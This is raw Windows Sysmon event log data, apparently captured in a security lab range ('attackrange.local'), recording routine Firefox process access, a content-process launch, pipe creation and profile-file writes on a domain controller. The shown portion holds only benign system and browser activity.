07:58:29.277{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104966Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.277{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104965Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.277{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104964Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.277{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104963Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.277{58E9C193-B422-615A-0602-00000000FC01}55524268C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Mozilla Firefox\xul.dll+1763224|C:\Program Files\Mozilla Firefox\xul.dll+a04d19|C:\Program Files\Mozilla Firefox\xul.dll+a03065|C:\Program Files\Mozilla Firefox\xul.dll+a0a25e|C:\Program Files\Mozilla Firefox\xul.dll+8b1df0|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+2680a|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104962Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.282{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe92.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5552.0.2146785856\425047693" -parentBuildID 20210922161155 -prefsHandle 1468 -prefMapHandle 1552 -prefsLen 1 -prefMapSize 235910 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 1848 2b08e657d38 gpuC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92MediumMD5=DBDB3EFACC3D9039A4F5703662099178,SHA256=534A44A08893AFBE78E04B4CFF80BD00BFC40562A923E8AF38E240227A643FFB,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 17141700x8000000000000000104961Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:29.277{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.0.214678585C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000104960Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:29.277{58E9C193-B422-615A-0602-00000000FC01}5552\gecko-crash-server-pipe.5552C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000104959Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.245{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104958Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.245{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104957Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.230{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104956Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.230{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104955Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:29.230{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082789Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:29.792{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105263Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.930{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\favicons.sqlite-walMD5=DB2D71C7F530E12B5B4C13189702D205,SHA256=854FAD24F3EC34268458F9FC8921CCED6974A4127ADA216F9E319E84D2A8415B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105262Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.930{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\favicons.sqlite-shmMD5=95A1C569FF3A3A3A7AFA159DF1D96C18,SHA256=E0D771CF150CF1070F9B4E58011B920A103BDE0618485B943FB42BA43B952CC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105261Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.909{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\favicons.sqlite-journalMD5=5077B587CA0E32E1CD454926F666D723,SHA256=4551E6E8A443FB97A91A2F9E20AE2D367CB8DAEA7F2E20A2F8111C4E2BFC4A7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105260Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.909{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\favicons.sqlite-journalMD5=E5C1840D21BD88D0205A5DBFDF19C7AB,SHA256=70A6F53077F1CB9A2289AC13A98F56E8B5D3EEFCF0E452E979937B082DDB25FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105259Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.893{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\places.sqlite-journalMD5=BEFCF14F761E11A16858B9E1CAF68424,SHA256=8A8A1128498A7F8B45E8C8079A97BD43F3536AF953F75084244315DE97291FCB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105258Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.830{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d5e|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6 10341000x8000000000000000105257Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.830{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d37|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6 10341000x8000000000000000105256Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.830{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+ed6d0c|C:\Program Files\Mozilla Firefox\xul.dll+289542|C:\Program Files\Mozilla Firefox\xul.dll+28882f|C:\Program Files\Mozilla Firefox\xul.dll+28861a|C:\Program Files\Mozilla Firefox\xul.dll+eeff55|C:\Program Files\Mozilla Firefox\xul.dll+18b861a|C:\Program Files\Mozilla Firefox\xul.dll+1acc418|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1acc65f|C:\Program Files\Mozilla Firefox\xul.dll+1ace974|C:\Program Files\Mozilla Firefox\xul.dll+177715e|C:\Program Files\Mozilla Firefox\xul.dll+1776835|C:\Program Files\Mozilla Firefox\xul.dll+c6c72f|C:\Program Files\Mozilla Firefox\xul.dll+274461|C:\Program Files\Mozilla Firefox\xul.dll+38136e|C:\Program Files\Mozilla Firefox\xul.dll+cfeed6 23542300x8000000000000000105255Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.826{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=13174C3709C255BD62AD4CD74EC17E79,SHA256=E23BB3269E798A2338287286C17C85871350BAC93E719D0C9412A1B260F95345,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105254Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.825{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=4213AC49DD0E831C0B7CF53AA85266D7,SHA256=BBF373DB15AB9809CEC876E535A287F3C39C0ECAEE3461C50DC2A41B5796D25C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105253Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.825{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105252Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.809{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105251Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.809{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105250Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.809{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105249Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.777{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=27F1101D0179ECD93AE9D6A603528033,SHA256=6C1877E9D4BAA960191D8097A833B4AD40DD9A083AF79EA0B840E152D6F61843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105248Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.777{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=605F0096E51C0BDECE6BDC9B2D004C5F,SHA256=364FD6828E8A7E4FA6A10B8BD45C3C44849EB2DB6F68B98EB3BD59908E263944,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105247Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.777{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105246Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.777{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105245Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.777{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\moz-extension+++bf046f72-173e-4f01-a118-3e568a0f3047^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.sqlite-walMD5=3E4F9A23D44F3677330F2153F29A1C53,SHA256=9F01095C6D13B75236432E8DD2D8800CB17E0AEC838A1DA999177849DD419C80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105244Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.762{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\default\moz-extension+++bf046f72-173e-4f01-a118-3e568a0f3047^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.sqlite-shmMD5=9BF1AF5486C4356077C9C67D05D1C63B,SHA256=F6DC667235557525F7022D88F1203FD5097A612557EA87D44912BF3A54B130B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105243Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.762{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\P09S3I~1.DEF\cert9.db-journalMD5=BD8837DA12E05A7D4C355747D08A1FD5,SHA256=283726DC7D8F0FCF287B4C3CDD361560E58E99AEC03F1E360623519B2D935BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105242Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.746{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla 